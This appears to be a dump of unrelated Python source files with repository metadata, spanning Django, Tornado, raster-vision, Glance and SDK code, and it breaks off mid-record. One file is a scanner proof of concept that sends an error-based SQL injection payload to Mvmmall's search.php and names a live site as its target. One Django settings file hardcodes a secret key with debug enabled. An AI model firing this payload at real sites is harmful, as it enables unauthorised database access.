plant.plant_enter_unit_products() time.sleep(2) plant.plant_enter_paid("1500") time.sleep(2) plant.plant_enter_submit() time.sleep(2) @classmethod def tearDownClass(cls): cls.driver.close() cls.driver.quit() print("Test Completed") if __name__ == '__main__': unittest.main()
e3275a76d2f0ad30f2d8dc25ef528b0dd70399d0
6f9a29946dc107cd44d88cf07c9d715ebe4208be
/source/services/music/music_service.py
61d9a993b50f6a801a8e9c6457c4172dae92f090
[]
no_license
cash2one/gongzhuhao
66bb14439a2265175bdd4b2f585456fcf47922bf
0596bcb429674b75243d343c73e0f022b6d86820
refs/heads/master
2021-01-18T15:38:37.258737
2015-10-28T09:13:33
2015-10-28T09:13:33
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,709
py
#encoding:utf-8 __author__ = 'frank' from services.base_services import BaseService from models.share_do import ShareMusic from utils.upload_utile import delete_from_oss from tornado.options import options class MusicServices(BaseService): def create_share_music(self,**kwargs): ''' todo:新增一首背景歌曲 :param kwargs: :return: ''' share_music = ShareMusic() share_music.Fmusic_name = kwargs.get('music_name') share_music.Fmusic_url = kwargs.get('request_url') self.db.add(share_music) self.db.commit() return share_music def query_share_music(self,**kwargs): ''' todo:查询背景歌曲 :param kwargs: :return: ''' query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0) if kwargs.get('start_date',''): query = query.filter(ShareMusic.Fcreate_time > kwargs.get('start_date')) if kwargs.get('end_date',''): query = query.filter(ShareMusic.Fcreate_time < kwargs.get('end_date')+' 23:59:59') if kwargs.get('music_name',''): query = query.filter(ShareMusic.Fmusic_name.like('%'+kwargs.get('music_name')+'%')) return query def delete_music(self,music_id): ''' todo:删除背景歌曲 :param music_id: 歌曲id :return: ''' query = self.db.query(ShareMusic).filter(ShareMusic.Fdeleted == 0,ShareMusic.Fid == music_id) filename = query.scalar().Fmusic_url[34:] data = {} data['Fdeleted'] = 1 query.update(data) self.db.commit() delete_from_oss(options.MEDIA_BUCKET,filename)
ca80285ee2929ac20cf43ad7fff92fb60b9efdea
f81c8e4d702d5c88af92c691d35b6f9c0d2f4390
/backend/dark_waterfall_26026/wsgi.py
e5039146e98431c055564aea9a661c25a52173fd
[]
no_license
crowdbotics-apps/dark-waterfall-26026
bdfd44240dae3c1ad20ed8b7a8da701308db5958
95f9eda959b6d21778ff59db2c5c9a585d6a670c
refs/heads/master
2023-04-12T17:31:25.091727
2021-04-29T19:14:56
2021-04-29T19:14:56
362,922,208
0
0
null
null
null
null
UTF-8
Python
false
false
417
py
""" WSGI config for dark_waterfall_26026 project. It exposes the WSGI callable as a module-level variable named ``application``. For more information on this file, see https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/ """ import os from django.core.wsgi import get_wsgi_application os.environ.setdefault('DJANGO_SETTINGS_MODULE', 'dark_waterfall_26026.settings') application = get_wsgi_application()
fa65a404c6278a30b5a8e1d2c8079c85f4f85dce
449f6888bff99d7e4fd86fa6ffa6b3316084e34e
/Solutions/018.py
b91be816ebd66827c26c6ae1526c59a9b3b118b9
[ "MIT" ]
permissive
All3yp/Daily-Coding-Problem-Solutions
e94679a5858b8a83ffe58d14b824fe80de21a694
199b9606474edb45bd14b20b511b691ada437586
refs/heads/master
2023-03-18T21:06:30.675503
2021-03-13T03:52:31
2021-03-13T03:52:31
null
0
0
null
null
null
null
UTF-8
Python
false
false
1,622
py
""" Problem: Given an array of integers and a number k, where 1 <= k <= length of the array, compute the maximum values of each subarray of length k. For example, given array = [10, 5, 2, 7, 8, 7] and k = 3, we should get: [10, 7, 8, 8], since: 10 = max(10, 5, 2) 7 = max(5, 2, 7) 8 = max(2, 7, 8) 8 = max(7, 8, 7) Do this in O(n) time and O(k) space. You can modify the input array in-place and you do not need to store the results. You can simply print them out as you compute them. """ from collections import deque from typing import List def calc_max_per_k_elems(arr: List[int], k: int) -> List[int]: length = len(arr) if not arr: return None if length <= k: return max(arr) # storing results (even though the problem states it can be directly printed) result = [] dq = deque() # calculating the 1st element for i in range(k): while dq and arr[dq[-1]] < arr[i]: dq.pop() dq.append(i) result.append(arr[dq[0]]) # generating the rest of the resultant elements for i in range(k, length): # removing all elements apart from the last k elements while dq and dq[0] <= i - k: dq.popleft() # removing the elements smaller than the current element while dq and arr[dq[-1]] < arr[i]: dq.pop() dq.append(i) result.append(arr[dq[0]]) return result if __name__ == "__main__": print(calc_max_per_k_elems([10, 5, 2, 7, 8, 7], 3)) print(calc_max_per_k_elems([1, 91, 17, 46, 45, 36, 9], 3)) """ SPECS: TIME COMPLEXITY: O(n) SPACE COMPLEXITY: O(k) """
15b30860d116d827c4c3de9db43e689dffc3d70f
6c6531b6f93817a2720ff9b78fce6ad4d5bb500c
/PericiasMedicas/company/migrations/0007_auto_20191230_1711.py
5603642c2f74d64ccb13c8e644b23e6a6f6f2902
[]
no_license
massariolmc/periciasmedicas
6d3c142a5f5e308b049d57b30d698526c8aecda3
9b5b0e192bf51bb1b297f0983b2a0ab0c24b31b1
refs/heads/master
2022-12-08T11:13:10.981476
2020-02-21T23:32:44
2020-02-21T23:32:44
235,667,801
0
0
null
2022-11-22T05:15:44
2020-01-22T21:12:16
JavaScript
UTF-8
Python
false
false
472
py
# Generated by Django 2.2.7 on 2019-12-30 21:11 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('company', '0006_auto_20191230_1629'), ] operations = [ migrations.AlterField( model_name='company', name='state_registration', field=models.CharField(blank=True, default='', max_length=100, null=True, verbose_name='Inscrição Estadual'), ), ]
ae7a1e257d3423cfd604b1e6c27ffe19ee1012f5
6b3e8b4291c67195ad51e356ba46602a15d5fe38
/rastervision2/examples/utils.py
d521e74560b2de4494f0d0ff4344208ee3e221b0
[ "LicenseRef-scancode-generic-cla", "Apache-2.0" ]
permissive
csaybar/raster-vision
4f5bb1125d4fb3ae5c455db603d8fb749221dd74
617ca15f64e3b8a391432306a743f7d0dfff352f
refs/heads/master
2021-02-26T19:02:53.752971
2020-02-27T17:25:31
2020-02-27T17:25:31
245,547,406
2
1
NOASSERTION
2020-03-07T01:24:09
2020-03-07T01:24:08
null
UTF-8
Python
false
false
4,864
py
import csv from io import StringIO import tempfile import os import rasterio from shapely.strtree import STRtree from shapely.geometry import shape, mapping import shapely from rastervision.core import Box from rastervision.data import RasterioCRSTransformer, GeoJSONVectorSource from rastervision.utils.files import (file_to_str, file_exists, get_local_path, upload_or_copy, make_dir, json_to_file) from rastervision.filesystem import S3FileSystem def str_to_bool(x): if type(x) == str: if x.lower() == 'true': return True elif x.lower() == 'false': return False else: raise ValueError('{} is expected to be true or false'.format(x)) return x def get_scene_info(csv_uri): csv_str = file_to_str(csv_uri) reader = csv.reader(StringIO(csv_str), delimiter=',') return list(reader) def crop_image(image_uri, window, crop_uri): im_dataset = rasterio.open(image_uri) rasterio_window = window.rasterio_format() im = im_dataset.read(window=rasterio_window) with tempfile.TemporaryDirectory() as tmp_dir: crop_path = get_local_path(crop_uri, tmp_dir) make_dir(crop_path, use_dirname=True) meta = im_dataset.meta meta['width'], meta['height'] = window.get_width(), window.get_height() meta['transform'] = rasterio.windows.transform( rasterio_window, im_dataset.transform) with rasterio.open(crop_path, 'w', **meta) as dst: dst.colorinterp = im_dataset.colorinterp dst.write(im) upload_or_copy(crop_path, crop_uri) def save_image_crop(image_uri, image_crop_uri, label_uri=None, label_crop_uri=None, size=600, min_features=10, vector_labels=True): """Save a crop of an image to use for testing. If label_uri is set, the crop needs to cover >= min_features. Args: image_uri: URI of original image image_crop_uri: URI of cropped image to save label_uri: optional URI of label file label_crop_uri: optional URI of cropped labels to save size: height and width of crop Raises: ValueError if cannot find a crop satisfying min_features constraint. """ if not file_exists(image_crop_uri): print('Saving test crop to {}...'.format(image_crop_uri)) old_environ = os.environ.copy() try: request_payer = S3FileSystem.get_request_payer() if request_payer == 'requester': os.environ['AWS_REQUEST_PAYER'] = request_payer im_dataset = rasterio.open(image_uri) h, w = im_dataset.height, im_dataset.width extent = Box(0, 0, h, w) windows = extent.get_windows(size, size) if label_uri and vector_labels: crs_transformer = RasterioCRSTransformer.from_dataset( im_dataset) vs = GeoJSONVectorSource(label_uri, crs_transformer) geojson = vs.get_geojson() geoms = [] for f in geojson['features']: g = shape(f['geometry']) geoms.append(g) tree = STRtree(geoms) def p2m(x, y, z=None): return crs_transformer.pixel_to_map((x, y)) for w in windows: use_window = True if label_uri and vector_labels: w_polys = tree.query(w.to_shapely()) use_window = len(w_polys) >= min_features if use_window and label_crop_uri is not None: print('Saving test crop labels to {}...'.format( label_crop_uri)) label_crop_features = [ mapping(shapely.ops.transform(p2m, wp)) for wp in w_polys ] label_crop_json = { 'type': 'FeatureCollection', 'features': [{ 'geometry': f } for f in label_crop_features] } json_to_file(label_crop_json, label_crop_uri) if use_window: crop_image(image_uri, w, image_crop_uri) if not vector_labels and label_uri and label_crop_uri: crop_image(label_uri, w, label_crop_uri) break if not use_window: raise ValueError('Could not find a good crop.') finally: os.environ.clear() os.environ.update(old_environ)
6035dce05ab1ceb238455998bedfa82823ff466e
3471728291ab015e6780763218f96a369897f5c4
/imagefactory_plugins/OpenStack/glance_upload.py
c2b28347f49d65700b6205043a0e6637b27930f4
[ "Apache-2.0" ]
permissive
zyga/imagefactory
913fb4a987a746cff72f3074e0e338e896ac2e65
b2a57168f1ef6608aedad73ed7ccd1e3626b2967
refs/heads/master
2020-03-24T07:33:43.270977
2018-06-26T19:37:55
2018-06-26T19:37:55
142,568,326
1
0
Apache-2.0
2018-07-27T11:20:36
2018-07-27T11:20:36
null
UTF-8
Python
false
false
1,452
py
# Copyright 2012 Red Hat, Inc. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. from glance import client as glance_client from pprint import pprint def glance_upload(image_filename, creds = {'auth_url': None, 'password': None, 'strategy': 'noauth', 'tenant': None, 'username': None}, host = "0.0.0.0", port = "9292", token = None): image_meta = {'container_format': 'bare', 'disk_format': 'qcow2', 'is_public': True, 'min_disk': 0, 'min_ram': 0, 'name': 'Factory Test Image', 'properties': {'distro': 'rhel'}} c = glance_client.Client(host=host, port=port, auth_tok=token, creds=creds) image_data = open(image_filename, "r") image_meta = c.add_image(image_meta, image_data) image_data.close() return image_meta['id'] image_id = glance_upload("/root/base-image-f19e3f9b-5905-4b66-acb2-2e25395fdff7.qcow2") print image_id
c801f423eba575edaad8ae847ba8affbbb0388d1
7e2214619d5948d0d5f7e22f46dee679d722d7b3
/dealOrNoDeal.py
309ffe88c017c45a4345d69b454a2286181be26f
[]
no_license
udwivedi394/misc
ef6add31a92e0d2d0505e8be016f0a868a6ac730
64dffb5db04c38465fffb415bec1d433b1caa8f6
refs/heads/master
2021-09-09T06:16:32.124586
2018-03-14T05:10:55
2018-03-14T05:10:55
116,167,845
0
0
null
null
null
null
UTF-8
Python
false
false
1,934
py
#Nest away import sys def dealorNoDeal05(A,B): lookup = [B-i for i in A] maxi = 0 for i in xrange(1,len(lookup)): if lookup[i] >= 0: lookup[i] = lookup[i]+(lookup[i-1] if lookup[i-1] >=0 else 0) maxi = max(maxi,lookup[i]) return maxi def dealorNoDeal(A,B): lookup = A#[B-i for i in A] maxi = 0 for i in xrange(len(lookup)): lookup[i] = max(lookup[i],lookup[i]+lookup[i-1] if i>0 else 0) maxi = max(maxi,lookup[i]) return maxi def dealorNoDeal03(A,B): lookup = A for i in xrange(len(lookup)): lookup[i] = B-lookup[i] maxi = 0 for i in xrange(1,len(lookup)): if lookup[i] >= 0: lookup[i] = lookup[i]+(lookup[i-1] if lookup[i-1] >=0 else 0) maxi = max(maxi,lookup[i]) return maxi def dealorNoDeal04(A,B): lookup = A maxi = 0 for i in xrange(len(lookup)): if B-lookup[i] >= 0: lookup[i] = (B-lookup[i])+(lookup[i-1] if i > 0 and lookup[i-1] >=0 else 0) maxi = max(maxi,lookup[i]) else: lookup[i] = B-lookup[i] print lookup return maxi """ if __name__=="__main__": f1 = open("testCaseMaxSeq02.txt",'r') for x in xrange(int(f1.readline().strip())): #n,c = map(int,sys.stdin.readline().strip().split()) n = map(int,f1.readline().strip().split()) A = map(int,f1.readline().strip().split()) c = 0 result = dealorNoDeal(A,c) sys.stdout.write(str(result)) print f1.close() """ if __name__=="__main__": for x in xrange(int(sys.stdin.readline().strip())): n,c = map(int,sys.stdin.readline().strip().split()) #n = map(int,sys.stdin.readline().strip().split()) A = map((lambda x: c-int(x)),sys.stdin.readline().strip().split()) #c = 0 result = dealorNoDeal(A,c) sys.stdout.write(str(result)) print #"""
c2835b1f8a3632284eca779d2dc1f17bfaf30295
6d501ea43b1a52bf4af44ae5677eba8b928ffec3
/directory/signals.py
e1d22e0a309d7321f2db634715374ef5fabc6e4f
[]
no_license
mozilla/hive-django
78d5e7bf687e2311a41d2b6d555b9671c4270b4d
bf95dce0af0148ecacde2256d235788fd79c7d5e
refs/heads/master
2023-08-27T12:47:36.977377
2016-05-04T21:12:47
2016-05-04T21:12:47
55,106,672
0
2
null
2016-05-04T21:12:47
2016-03-31T00:12:58
Python
UTF-8
Python
false
false
1,684
py
from django.dispatch import receiver from django.contrib.sites.models import Site from django.db.models.signals import post_save from django.contrib.auth.signals import user_logged_in from django.contrib import messages from registration.signals import user_activated from .models import City, User, Organization, Membership, is_user_vouched_for @receiver(post_save, sender=City) def clear_site_cache_when_city_changes(**kwargs): # It's possible that the site may be associated with a different # city now, so clear the site cache. Site.objects.clear_cache() @receiver(post_save, sender=User) def create_membership_for_user(sender, raw, instance, **kwargs): if raw: return if not len(Membership.objects.filter(user=instance)): membership = Membership(user=instance) membership.save() @receiver(user_activated) def auto_register_user_with_organization(sender, user, request, **kwargs): if user.membership.organization: return orgs = Organization.objects.possible_affiliations_for(user) if orgs.count() != 1: return org = orgs[0] user.membership.organization = org user.membership.save() @receiver(user_logged_in) def tell_user_to_update_their_profile(sender, user, request, **kwargs): if not is_user_vouched_for(user): return if not user.membership.bio: messages.info(request, 'You don\'t have a bio! You should write one ' 'so community members can learn more about you. ' 'Just visit your user profile by accessing the ' 'user menu at the top-right corner of this page.', fail_silently=True)
98616241fbdcb931bae105f55cdfe34251a2d974
26408f11b938a00f8b97a3e195095a45a12dc2c7
/sneeze/Player.py
e1aecbdfcc7127f7257b5d20b68035b164acb822
[]
no_license
cz-fish/sneeze-dodger
a7ea25e9267d408e8f46a9fb7a988d52dca8bd8e
4fd333345d1f7d82c92ddcb15f18077362766844
refs/heads/master
2022-07-07T01:39:06.162125
2020-05-18T08:01:57
2020-05-18T08:01:57
255,090,774
0
0
null
null
null
null
UTF-8
Python
false
false
849
py
from sneeze.Actor import Actor from sneeze.Sprite import Sprite from sneeze.Types import * class Player(Actor): def __init__(self): super().__init__() self.sprite = Sprite.load('guy') def move(self, inputs: Inputs, collision) -> None: self.update_speed(inputs.xvalue, inputs.yvalue) new_pos = collision(self.pos, self.speed_vec) if new_pos == self.pos: self.speed_vec = Pos(0, 0) self.move_to(new_pos) # walk phase; reset if not moving if abs(self.speed_vec.x) < 2 and abs(self.speed_vec.y) < 2: self.animation = Animation('idle', 0) else: key, phase = self.animation if key == 'walk': self.animation = Animation(key, phase + 1) else: self.animation = Animation('walk', 0)
c3b2ccf3279e3d6c131b50d1a8a089fc8ee00b32
5a52ccea88f90dd4f1acc2819997fce0dd5ffb7d
/alipay/aop/api/domain/BizListDataInfo.py
5f874dfae528b4b6592ad1306c025ec59eb0239e
[ "Apache-2.0" ]
permissive
alipay/alipay-sdk-python-all
8bd20882852ffeb70a6e929038bf88ff1d1eff1c
1fad300587c9e7e099747305ba9077d4cd7afde9
refs/heads/master
2023-08-27T21:35:01.778771
2023-08-23T07:12:26
2023-08-23T07:12:26
133,338,689
247
70
Apache-2.0
2023-04-25T04:54:02
2018-05-14T09:40:54
Python
UTF-8
Python
false
false
1,206
py
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.constant.ParamConstants import * class BizListDataInfo(object): def __init__(self): self._code = None self._name = None @property def code(self): return self._code @code.setter def code(self, value): self._code = value @property def name(self): return self._name @name.setter def name(self, value): self._name = value def to_alipay_dict(self): params = dict() if self.code: if hasattr(self.code, 'to_alipay_dict'): params['code'] = self.code.to_alipay_dict() else: params['code'] = self.code if self.name: if hasattr(self.name, 'to_alipay_dict'): params['name'] = self.name.to_alipay_dict() else: params['name'] = self.name return params @staticmethod def from_alipay_dict(d): if not d: return None o = BizListDataInfo() if 'code' in d: o.code = d['code'] if 'name' in d: o.name = d['name'] return o
0df491aaf04bd5efd3e1d19660af119f72bb10a1
93a959b0458bcdb60d33a4504f483078a78a56b6
/CwnGraph/cwn_annotator.py
7b58fe2e65d190fd9571cc70e6a5695b91cfcc2f
[]
no_license
kylecomtw/CwnGraph
a82d763a645c3342502274e6760cb63593f23d42
86ddb17de548a61c57f925fb2d783467431db18b
refs/heads/master
2021-10-24T10:00:19.913420
2019-03-25T04:45:36
2019-03-25T04:45:36
84,843,165
3
2
null
null
null
null
UTF-8
Python
false
false
5,050
py
import os import json from datetime import datetime from . import cwnio from . import annot_merger from .cwn_types import * from .cwn_graph_utils import CwnGraphUtils class CwnAnnotator: PREFIX = "annot/cwn_annot" def __init__(self, cgu, session_name): self.parent_cgu = cgu self.name = session_name self.V = {} self.E = {} self.meta = { "session_name": session_name, "timestamp": "", "serial": 0, "base_hash": cgu.get_hash() } self.load(session_name) def load(self, name): fpath = f"{CwnAnnotator.PREFIX}_{name}.json" if os.path.exists(fpath): print("loading saved session from ", fpath) self.meta, self.V, self.E = \ cwnio.load_annot_json(fpath) base_hash = self.meta.get("base_hash", "") if base_hash and base_hash != self.parent_cgu.get_hash(): print("WARNING: loading with a different base image") return True else: print("Creating new session", name) return False def save(self, with_timestamp=False): name = self.meta["session_name"] timestamp = datetime.now().strftime("%y%m%d%H%M%S") self.meta["snapshot"] = timestamp cwnio.ensure_dir("annot") if with_timestamp: cwnio.dump_annot_json(self.meta, self.V, self.E, f"{CwnAnnotator.PREFIX}_{name}_{timestamp}.json") else: cwnio.dump_annot_json(self.meta, self.V, self.E, f"{CwnAnnotator.PREFIX}_{name}.json") def new_node_id(self): serial = self.meta.get("serial", 0) + 1 session_name = self.meta.get("session_name", "") self.meta["serial"] = serial return f"{session_name}_{serial:06d}" def create_lemma(self, lemma): node_id = self.new_node_id() new_lemma = CwnLemma(node_id, self) new_lemma.lemma = lemma self.set_lemma(new_lemma) return new_lemma def create_sense(self, definition): node_id = self.new_node_id() new_sense = CwnSense(node_id, self) new_sense.definition = definition self.set_sense(new_sense) return new_sense def create_relation(self, src_id, tgt_id, rel_type): if not self.get_node_data(src_id): raise ValueError(f"{src_id} not found") if not self.get_node_data(tgt_id): raise ValueError(f"{tgt_id} not found") edge_id = (src_id, tgt_id) new_rel = CwnRelation(edge_id, self) new_rel.relation_type = rel_type self.set_relation(new_rel) return new_rel def set_lemma(self, cwn_lemma): self.V[cwn_lemma.id] = cwn_lemma.data() def set_sense(self, cwn_sense): self.V[cwn_sense.id] = cwn_sense.data() def set_relation(self, cwn_relation): self.E[cwn_relation.id] = cwn_relation.data() def remove_lemma(self, cwn_lemma): cwn_lemma.action = "delete" self.set_lemma(cwn_lemma) def remove_sense(self, cwn_sense): cwn_sense.action = "delete" self.set_sense(cwn_sense) def remove_relation(self, cwn_relation): cwn_relation.action = "delete" self.set_relation(cwn_relation) def find_glyph(self, instr): return self.parent_cgu.find_glyph(instr) def find_senses(self, lemma="", definition="", examples=""): cgu = CwnGraphUtils(self.V, self.E) senses = cgu.find_senses(lemma, defintion, examples) parent_senses = self.parent_cgu.find_senses(lemma, definition, examples) ret = annot_merger.merge(senses, parent_senses, self) return ret def find_lemmas(self, instr_regex): cgu = CwnGraphUtils(self.V, self.E) lemmas = cgu.find_lemma(instr_regex) parent_lemmas = self.parent_cgu.find_lemma(instr_regex) ret = annot_merger.merge(lemmas, parent_lemmas, self) return ret def find_edges(self, node_id, is_directed = True): cgu = CwnGraphUtils(self.V, self.E) edges = cgu.find_edges(node_id, is_directed) parent_edges = self.parent_cgu.find_edges(node_id, is_directed) ret = annot_merger.merge(edges, parent_edges, self) return ret def get_node_data(self, node_id): node_data = self.V.get(node_id, {}) if not node_data: node_data = self.parent_cgu.get_node_data(node_id) return node_data def get_edge_data(self, edge_id): edge_data = self.E.get(edge_id, {}) if not edge_data: edge_data = self.parent_cgu.get_edge_data(edge_id) return edge_data def connected(self, node_id, is_directed = True, maxConn=100, sense_only=True): raise NotImplementedError("connected() is not implemented in CwnAnnotator")
127f14137ff8c69323cb99a5ec67d900927cca5e
4b17225bc3860419edb6a8818bbac82e6b36e79d
/employee_tracker/settings.py
ce1b5d600785fc29625c723fdb419d1d986f35e8
[]
no_license
argon2008-aiti/employee_tracker
8ab45ee727e07b242d6ac3fb446ca5c1b9649bb0
5be7c3bb323f3b350d26df4d4813b6b071324277
refs/heads/master
2021-01-15T13:00:03.644233
2016-10-06T16:42:28
2016-10-06T16:42:28
35,000,045
0
0
null
null
null
null
UTF-8
Python
false
false
3,444
py
""" Django settings for employee_tracker project. For more information on this file, see https://docs.djangoproject.com/en/1.6/topics/settings/ For the full list of settings and their values, see https://docs.djangoproject.com/en/1.6/ref/settings/ """ # Build paths inside the project like this: os.path.join(BASE_DIR, ...) import os BASE_DIR = os.path.dirname(os.path.dirname(__file__)) # Quick-start development settings - unsuitable for production # See https://docs.djangoproject.com/en/1.6/howto/deployment/checklist/ # SECURITY WARNING: keep the secret key used in production secret! SECRET_KEY = 'cdkxms9u50qs@ig3j3s771u55ntlvxp2h8pijlx2rr83ms)#7q' # SECURITY WARNING: don't run with debug turned on in production! DEBUG = True TEMPLATE_DEBUG = True ALLOWED_HOSTS = [".herokuapp.com"] # Application definition INSTALLED_APPS = ( 'django.contrib.admin', 'django.contrib.auth', 'django.contrib.contenttypes', 'django.contrib.sessions', 'django.contrib.messages', 'django.contrib.staticfiles', 'south', 'monitor', 'leaflet', 'djgeojson', 'django_ajax', ) MIDDLEWARE_CLASSES = ( 'django.contrib.sessions.middleware.SessionMiddleware', 'django.middleware.common.CommonMiddleware', #'django.middleware.csrf.CsrfViewMiddleware', 'django.contrib.auth.middleware.AuthenticationMiddleware', 'django.contrib.messages.middleware.MessageMiddleware', 'django.middleware.clickjacking.XFrameOptionsMiddleware', ) ROOT_URLCONF = 'employee_tracker.urls' WSGI_APPLICATION = 'employee_tracker.wsgi.application' # Database # https://docs.djangoproject.com/en/1.6/ref/settings/#databases DATABASES = { 'default': { 'ENGINE': 'django.db.backends.sqlite3', 'NAME': os.path.join(BASE_DIR, 'db.sqlite3'), } } # for graphviz GRAPH_MODELS = { } # Internationalization # https://docs.djangoproject.com/en/1.6/topics/i18n/ LANGUAGE_CODE = 'en-us' TIME_ZONE = 'UTC' USE_I18N = True USE_L10N = True USE_TZ = True # Static files (CSS, JavaScript, Images) # https://docs.djangoproject.com/en/1.6/howto/static-files/ # static file directories STATICFILES_DIRS = ( ('assets', 'static'), ) # base url at which static files are served STATIC_URL = '/assets/' STATIC_ROOT = os.path.join(BASE_DIR,'assets') LOGIN_URL = '/login' STATICFILES_FINDERS = ( 'django.contrib.staticfiles.finders.FileSystemFinder', 'django.contrib.staticfiles.finders.AppDirectoriesFinder', ) TEMPLATE_LOADERS = ( 'django.template.loaders.filesystem.Loader', 'django.template.loaders.app_directories.Loader', 'django.template.loaders.eggs.Loader', ) # Template files (html+django templates) TEMPLATE_DIRS = ( os.path.join(BASE_DIR, "templates"), ) # Production code if DEBUG==False: #parse database configuration from $DATABASE_URL import dj_database_url DATABASES['default'] = dj_database_url.config() # Honor the 'X-Forwarded-Proto' header for request.is_secure() SECURE_PROXY_SSL_HEADER = ('HTTP_X_FORWARDED_PROTO', 'https') # Allow all host headers ALLOWED_HOSTS = ['*'] # Static asset configuration import os BASE_DIR = os.path.dirname(os.path.abspath(__file__)) STATIC_ROOT = 'staticfiles' STATIC_URL = '/static/' STATICFILES_DIRS = ( os.path.join(BASE_DIR, 'static'), )
0c448d5d9533485b666d5f11510eb4bdf0e13294
9fa07ba96a5330712bb1f1d0874375e6f4923ce7
/wait/www/387.py
3d6ab8263419dea2fd32e7413af8f4570a1f4842
[]
no_license
Ajatars/Ajatar
cf4460d881b18095ce968c883e68500d44f90570
943b71285e6b74ae38861aa305d26b0a9bef4050
refs/heads/master
2020-06-02T02:14:05.989075
2019-06-10T02:48:10
2019-06-10T02:48:10
191,002,958
11
2
null
null
null
null
UTF-8
Python
false
false
981
py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ POC Name : Mvmmall search.php SQL Injection Reference : http://www.wooyun.org/bugs/wooyun-2011-01732 Author : NoName """ import re from urllib.parse import urlparse def assign(service, arg): if service == "www": r = urlparse(arg) return True, '%s://%s/' % (r.scheme, r.netloc) def audit(arg): payload = "search.php?tag_ids[goods_id]=uid))%20and(select%201%20from(select%20count(*),concat((select%20(select%20md5(12345))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1%23" code, head, res, errcode, _ = curl.curl(arg + payload) if code == 200: m = re.search("827ccb0eea8a706c4c34a16891f84e7b1",res) if m: security_hole('Mvmmall search.php SQL Injection exists.') if __name__ == '__main__': from dummy import * audit(assign('www', 'http://dajiamai.com/')[1])
707062ffa62600fed5892717cfc5efb6677b3277
9743d5fd24822f79c156ad112229e25adb9ed6f6
/xai/brain/wordbase/nouns/_plough.py
8524ffbb0f26cf406e78e16dbed5ed7ccee77fc1
[ "MIT" ]
permissive
cash2one/xai
de7adad1758f50dd6786bf0111e71a903f039b64
e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6
refs/heads/master
2021-01-19T12:33:54.964379
2017-01-28T02:00:50
2017-01-28T02:00:50
null
0
0
null
null
null
null
UTF-8
Python
false
false
427
py
#calss header class _PLOUGH(): def __init__(self,): self.name = "PLOUGH" self.definitions = [u'a large farming tool with blades that digs the soil in fields so that seeds can be planted', u'If land is under the plough, crops are grown on it: '] self.parents = [] self.childen = [] self.properties = [] self.jsondata = {} self.specie = 'nouns' def run(self, obj1 = [], obj2 = []): return self.jsondata
816403dc9d93b4276bffb4d8e162c51ea13231b8
0be45470f15f12872d81f98c72e3b8528100ad27
/pointCollection/tools/RDE.py
563e437d633d241e661519931619d6cf3b3cf410
[ "MIT" ]
permissive
SmithB/pointCollection
19a43bb19b1753542f693645fe4f537c2dbf7af9
026a60eb7e2fbe5333c7a30bd8299dda44c5878e
refs/heads/master
2023-08-23T18:56:49.943934
2023-08-18T16:41:12
2023-08-18T16:41:12
220,045,965
4
8
MIT
2023-07-03T15:47:58
2019-11-06T16:51:04
Jupyter Notebook
UTF-8
Python
false
false
584
py
# -*- coding: utf-8 -*- """ Created on Mon Oct 23 16:31:30 2017 @author: ben """ import numpy as np def RDE(x): xs=x.copy() xs=np.isfinite(xs) # this changes xs from values to a boolean if np.sum(xs)<2 : return np.nan ind=np.arange(0.5, np.sum(xs)) LH=np.interp(np.array([0.16, 0.84])*np.sum(xs), ind, np.sort(x[xs])) #print('LH =',LH) return (LH[1]-LH[0])/2. # trying to get some kind of a width of the data ~variance #import scipy.stats as stats #def RDE(x): # return (stats.scoreatpercentile(x, 84 )-stats.scoreatpercentile(x, 16))/2.
ec81f69f8b35b27ca38c0fabe125ba6ef4bc3a1d
1975ee674b36084366b1bbe2c091d8f0f8795dc0
/demo/class_views.py
49ac0086b684256a0215318d23d4992296ad6f5e
[]
no_license
srikanthpragada/PYTHON_03_JULY_2018_WEBDEMO
f193213788deadcab7ac7b183328269ba1334488
56e076ad30703117cafc56d6d95449c6ec8eebb2
refs/heads/master
2020-03-25T11:45:53.128704
2018-08-23T15:29:05
2018-08-23T15:29:05
143,747,408
0
0
null
null
null
null
UTF-8
Python
false
false
877
py
from django.views.generic import TemplateView, ListView from django.shortcuts import render from .forms import LoginForm from .models import Course class ClassView1(TemplateView): template_name = 'class_view1.html' class LoginView(TemplateView): template_name = 'login.html' def get(self, request): form = LoginForm() return render(request, self.template_name, {'form': form}) def post(self, request): form = LoginForm(request.POST) if form.is_valid(): print(form.cleaned_data['username'], form.cleaned_data['password']) return render(request, self.template_name, {'form': form}) # Generic View - ListView demo class ListCourseView(ListView): model = Course template_name = "courses.html" # default is demo/course_list.html context_object_name = 'courses' # default is object_list
275aa3e362920aae1e2af84fe0380f36fa448f39
55c250525bd7198ac905b1f2f86d16a44f73e03a
/Python/pygame/pygameweb/pygameweb/db.py
57c70ca70133b811d4447037d0df7cd54b72e632
[ "BSD-2-Clause" ]
permissive
NateWeiler/Resources
213d18ba86f7cc9d845741b8571b9e2c2c6be916
bd4a8a82a3e83a381c97d19e5df42cbababfc66c
refs/heads/master
2023-09-03T17:50:31.937137
2023-08-28T23:50:57
2023-08-28T23:50:57
267,368,545
2
1
null
2022-09-08T15:20:18
2020-05-27T16:18:17
null
UTF-8
Python
false
false
129
py
version https://git-lfs.github.com/spec/v1 oid sha256:95c026dc0e7051336cd999158979e81f159d4470489660469d0e0175c66400da size 1274
e7e2e35e74f6f746945d6189c17e6e7c5bf68ec4
4c852fab792606580acb3f3a61b7f86ae25930b0
/Python/MIT-CompThinking/MITx600.1x/ProblemSets/wk3/L5PROBLEM5.py
5fc93127f17702a2607600df981bd5e7b2f929a5
[]
no_license
hmchen47/Programming
a9767a78a35c0844a1366391f48b205ff1588591
9637e586eee5c3c751c96bfc5bc1d098ea5b331c
refs/heads/master
2022-05-01T01:57:46.573136
2021-08-09T04:29:40
